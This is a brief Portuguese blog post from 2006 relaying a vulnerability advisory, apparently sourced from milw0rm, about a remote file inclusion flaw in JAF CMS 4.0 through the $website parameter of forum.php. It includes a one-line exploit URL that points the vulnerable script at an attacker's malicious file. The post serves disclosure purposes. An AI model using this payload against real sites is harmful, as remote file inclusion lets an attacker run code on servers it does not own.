terça-feira, outubro 03, 2006

JAF CMS 4.0 - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $website= do arquivo forum.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: JAF CMS 4.0
Download: sourceforge.net
Código vulnerável (forum.php):
indisponível
Desoberta por: Kacper (a.k.a Rahim)
Exploit:
http://host/module/forum/forum.php?fd=hack&website=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: milw0rm.com
Postado por às

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)